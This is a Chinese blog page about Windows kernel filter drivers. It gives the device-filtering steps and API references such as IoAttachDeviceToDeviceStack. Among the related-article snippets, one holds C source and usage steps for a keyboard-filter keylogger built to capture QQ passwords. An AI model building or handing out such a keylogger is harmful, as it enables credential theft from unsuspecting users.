windows 驱动 设备过滤步骤以及相关函数学习

最新推荐文章于 2022-06-21 21:12:03 发布
最新推荐文章于 2022-06-21 21:12:03 发布
阅读量791 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: VC 文章标签: windows object filter extension system file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhlich111/article/details/7262809
本文详细介绍了在Windows环境下创建和管理过滤设备的过程,包括设备对象的获取与生成、设备间的绑定与解除绑定、以及设备对象的删除等关键步骤。同时,还提供了相关API函数如IoGetDeviceObjectPointer、IoCreateDevice等的使用说明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

步骤如下:

1、获取获取设备对象

2、生成过滤设备

3、设备绑定 

4、把过滤设备绑定到设备对象上

5、进行过滤处理

6、解除设备绑定

7、删除生成的过滤设备

 

涉及函数如下:

1、通过设备名获取设备指针

IoGetDeviceObjectPointer

The IoGetDeviceObjectPointer routine returns a pointer to the top object in the named device object's stack and a pointer to the corresponding file object, if the requested access to the objects can be granted.

NTSTATUS 
  IoGetDeviceObjectPointer(
    IN PUNICODE_STRING  ObjectName,
    IN ACCESS_MASK  DesiredAccess,
    OUT PFILE_OBJECT  *FileObject,
    OUT PDEVICE_OBJECT  *DeviceObject
    );

 

2、生成设备对象

Creating the Filter Device Object

Call IoCreateDevice to create a filter device object to attach to a volume or file system stack. In the FileSpy sample, this is done as follows:

status = IoCreateDevice(
        gFileSpyDriverObject,                 // DriverObject
        sizeof(FILESPY_DEVICE_EXTENSION),     // DeviceExtensionSize
        NULL,                                 // DeviceName
        DeviceObject->DeviceType,             // DeviceType
        0,                                    // DeviceCharacteristics
        FALSE,                                // Exclusive
        &newDeviceObject);                    // DeviceObject

 

3、绑定一个设备到另一个设备上IoAttachDeviceToDeviceStack

The IoAttachDeviceToDeviceStack routine attaches the caller's device object to the highest device object in the chain and returns a pointer to the previously highest device object.

PDEVICE_OBJECT 
  IoAttachDeviceToDeviceStack(
    IN PDEVICE_OBJECT  SourceDevice,
    IN PDEVICE_OBJECT  TargetDevice
    );

Parameters
SourceDevice
Pointer to the caller-created device object.
TargetDevice
Pointer to another driver's device object, such as a pointer returned by a preceding call to IoGetDeviceObjectPointer.

 

4、负责将绑定的设备解除绑

IoDetachDevice

The IoDetachDevice routine releases an attachment between the caller's device object and a lower driver's device object.

VOID 
  IoDetachDevice(
    IN OUT PDEVICE_OBJECT  TargetDevice
    );

Parameters
TargetDevice
Pointer to the lower driver's device object. The caller previously called IoAttachDevice or IoAttachDeviceToDeviceStack successfully to get this pointer.
Return Value

None

 

5、删除这个设备对象

IoDeleteDevice

The IoDeleteDevice routine removes a device object from the system, for example, when the underlying device is removed from the system.

VOID 
  IoDeleteDevice(
    IN PDEVICE_OBJECT  DeviceObject
    );

Parameters
DeviceObject
Pointer to the device object to be deleted.
Return Value

None

其他函数:

1、获得IRP的当前栈空间指针

IoGetCurrentIrpStackLocation

The IoGetCurrentIrpStackLocation routine returns a pointer to the caller's stack location in the given IRP.

PIO_STACK_LOCATION 
  IoGetCurrentIrpStackLocation(
    IN PIRP  Irp
    );

Parameters
Irp
Pointer to the IRP.
Return Value

The routine returns a pointer to the I/O stack location for the driver.

 

2、所有电源操作,全部直接放过代码

                // 直接发送,然后返回说已经被处理了。
                PoStartNextPowerIrp(irp);//vista已经不需要
                IoSkipCurrentIrpStackLocation(irp);
                return PoCallDriver(s_nextobj[i],irp);

 3、其它非电源请求,直接下发执行即可。不禁止或者改变它代码
            IoSkipCurrentIrpStackLocation(irp);
            return IoCallDriver(s_nextobj[i],irp);

图像处理基础(2):自适应中值滤波器(基于OpenCV实现)
weixin_34128501的博客
02-08 2985
本文主要介绍了自适应的中值滤波器,并基于OpenCV实现了该滤波器,并且将自适应的中值滤波器和常规的中值滤波器对不同概率的椒盐噪声的过滤效果进行了对比。最后,对中值滤波器的优缺点了进行了总结。 空间滤波器 一个空间滤波器包括两个部分: 一个邻域,滤波器进行操作的像素集合,通常是一个矩形区域 对邻域中像素进行的操作 一个滤波器就是在选定的邻域像素上执行预先定义好的操作产生新的像素,并用新的像素替...
驱动开发】Windows过滤平台(WFP,Windows Filtering Platform)
qq_42814021的博客
04-13 4961
TDI:Transport Driver Interface,传输层接口。TDI在Windows Vista之后就不再支持了,之后的版本中被WFP取代。socket可以指定某种方式开始传输用户的数据(比如TCP或UDP),这就是传输层。传输层的特点是:用户只需要关心实际需要传输的用户数据,而不用担心数据实际的发送次数、如何封装、如何确定发送正确性、出错何重发等。Windows过滤平台(Windows Filter Platform),是从Vista系统后新增的一套系统API和服务,为网络数据包过滤
Windows文件系统过滤驱动开发教程(第二版)
03-24
文件系统过滤驱动开发教程,楚狂人的作品,对于初学者很有参考价值
windows过滤设备绑定的内核API之一
博文视点(北京)官方博客
06-10 1783
windows过滤设备绑定的内核API之一    进行过滤的最主要的方法是对一个设备对象(Device Object)进行绑定。读者可以想象,Windows系统之所以可以运作,是因为Windows中已经存在许多提供了各种功能的设备对象。这些设备对象接收请求,并完成实际硬件的功能。    我们可以首先认为:一个真实的设备对应一个设备对象(虽然实际对应关系可能复杂得多)。通过编程可以生成
Windows过滤驱动程序的概念
bcbobo21cn的专栏
04-04 1295
过滤filter过滤是在不影响上层和下层接口的情况下,在Windows系统内核中加入新的层,从而不需要修改上层的软件或者下层的真实驱动程序,就加入了新的功能。 举个例子: 实时监控的反病毒程序。任何高层软件或者Windows的文件系统都没有考虑过应该什么时候去检查文件中是否含有某个病毒的特征 码,也不应该要求某个软件或者Windows的文件系统去考虑这些;反病毒程序需要在不改变文件系统的上层和下层接口的情况下,在中间加入一个过滤 层,这样就可以在上层软件读取文件、下层驱动提供...
文件过滤驱动用于windows驱动学习
10-19
Windows驱动开发中,文件过滤驱动通常通过以下步骤工作: 1. **注册Filter Driver**:驱动程序首先需要注册自己为一个文件系统过滤驱动。这通常在DriverEntry函数中完成,通过调用IoCreateFilterDriver或...
实现Windows系统USB过滤驱动的关键步骤
Windows系统中实现USB过滤驱动是一个相对高级的系统编程任务,涉及到对Windows驱动程序模型的理解,USB设备的识别与控制,以及驱动程序的安全性、稳定性的考虑。本知识点将深入探讨如何在Windows环境下开发USB过滤...
Windows驱动模型下的USB设备过滤驱动程序设计与分析
"本文主要分析了基于USB设备过滤驱动程序的算法,探讨了Windows Driver Model (WDM)中的过滤驱动程序在优化USB设备性能方面的作用。通过对一个改进USB键盘功能的过滤驱动程序设计实例的深入解析,阐述了开发...
文件过滤驱动源代码 过滤层文件系统驱动的完整代码
08-07
总的来说,这个压缩包提供的源代码对于学习和理解文件过滤驱动的工作原理、如何实现文件加密以及操作截获功能,都是宝贵的资源。开发者可以通过研究这些代码,深入理解驱动开发,并且可能将其应用到自己的项目中,...
Windows文件系统过滤驱动开发详解
6. 设备栈、过滤与文件系统感知 - 解释了设备栈的层次结构,如何在文件系统和过滤驱动之间进行交互,以及如何让驱动感知到文件系统操作。 7. FSCDO、文件系统识别器和设备扩展 - 详细讨论了如何创建和管理文件系统...
QQ密码记录程序
05-15
http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159 最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。 开发环境 vs2008 winddk ddkwizard windowsxp Dbgview 实现方法 1.把过滤驱动挂载到键盘驱动上面 2.设置完成例程 3.通过KdPrint输出键盘扫描码到DebugView 4. 从DebugView的日志文件中读出键盘按键。 具体代码 1.把过滤驱动挂载到KeyBoardClass0上面 PFILE_OBJECT fileOjbect; PDEVICE_OBJECT deviceObject; UNICODE_STRING deviceName; PDEVICE_EXTENSION pdx; PDEVICE_OBJECT filterDeviceObject; PDEVICE_OBJECT targetDevice; fileOjbect=NULL; RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0"); status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;); pdoDeviceObj->Flags |= DO_BUFFERED_IO; pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension; pdx->pDevice=pdoDeviceObj; pdx->ustrDeviceName=usDeviceName; filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice; targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject); ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice; filterDeviceObject->DeviceType=targetDevice->DeviceType; filterDeviceObject->Characteristics=targetDevice->Characteristics; filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO)); ObDereferenceObject(fileOjbect); return STATUS_SUCCESS; 2.设置完成例程 PDEVICE_EXTENSION pdx; pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE); NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp); return status; 3.输出键盘按键的扫描码 NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { if(NT_SUCCESS(Irp->IoStatus.Status)) { PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer; if(keys->Flags==0x0001||keys->Flags==0x0003) KdPrint(("x",keys->MakeCode)); } if(Irp->PendingReturned) { IoMarkIrpPending(Irp); } return STATUS_SUCCESS; } 使用步骤 1.安装驱动 用DriverMonitor加载并运行Driver1.sys驱动文件 2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码 3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。 偶c语言菜鸟,欢迎大神们批评教育 不足的地方很多啊 多多交流 谢谢 邮箱328452421@qq.com http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159
最简单的驱动helloWDM
05-07
这是一个最简单的驱动程序,新手可以看一下。这是驱动的第一步!
Windows 驱动开发 新手入门(四)
Doub1's Blog
06-21 2625
本篇文章介绍一下设备对象,这是写驱动过滤的基础,比如键盘,串口等等的过滤。是的缩写,直译就是物理设备对象,一般来说,就是在就是的设备对象。 只能返回设备对象地址。 指向包含 Unicode 字符串的缓冲区的指针,该字符串是设备对象的名称。 指定表示所需访问的。 通常 ,DesiredAccess指定FILE_READ_DATA。 不经常指定FILE_WRITE_DATA或FILE_ALL_ACCESS访问权限。 指向表示相应设备对象到用户模式代码的文件对象的指针(如果调用成功)。 指向表示命名逻辑、虚
驱动开发坑总结
darthas的专栏
12-26 1212
1. 用FILE_FLAG_OVERLAPPED打开设备时,ReadFile、WriteFile的OVERLAP参数不能为空,否则会异常,到不了驱动的派遣函数 2. 用IoGetDeviceObjectPointer得到FILE_OBJECTDEVICE_OBJECT指针,用完后Deref文件对象就行了,设备对象千万别Deref,否则会损坏设备对象。他内部是ZwOpenFile再ObRefre
windows过滤驱动程序设计入门(驱动程序基本结构,设备栈,IRP栈和工作原理)
扣的CODE
07-26 3007
最近在学习windows驱动设计,认真看了些教材后总结了我认为驱动中都会涉及到,也最重要的概念,和大家分享。如果有说的不对的请大家留言指出。谢谢! 这里主要是写概念,代码涉及的不多也不详细,但是我会说出涉及到的API,详细的使用细节大家可以自己动手搜搜。掌握下面的概念之后,看驱动开发的教材里的代码,或者理解教材里说的内容应该就顺利很多!   过滤驱动程序概括: 对于windows驱动
Windows内核安全与驱动编程》-第八章-键盘的过滤学习-day1
WocW的博客
04-24 1277
文章目录键盘的过滤8.1 技术原理8.1.1 预备知识8.1.2 Windows 中从击键到内核8.1.3 键盘硬件原理8.2 键盘过滤的框架8.2.1 找到所有的键盘设备8.2.2 应用设备拓展8.2.3 键盘过滤模块的 DriverEntry8.2.4 键盘过滤模块的动态卸载明日计划 键盘的过滤 8.1 技术原理 8.1.1 预备知识 ​ 何为符号链接?符号链接其实就是一个“别名”,可以用一个...
Window XP驱动开发(二十四) 电源管理
chenyujing1234的专栏
08-09 5207
转载自: http://blog.youkuaiyun.com/xxxluozhen/article/details/5023703      一、电源管理 1、WDM电源管理模型 在Windows 2000和Windows 98中,操作系统接管了大部分电源管理工作。当然,这是因为只有操作系统才能真正了解电源管理的内部过程。例如,系统BIOS负责的电源管理不能区分应用程序使用的屏幕和屏幕保护程序使用
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值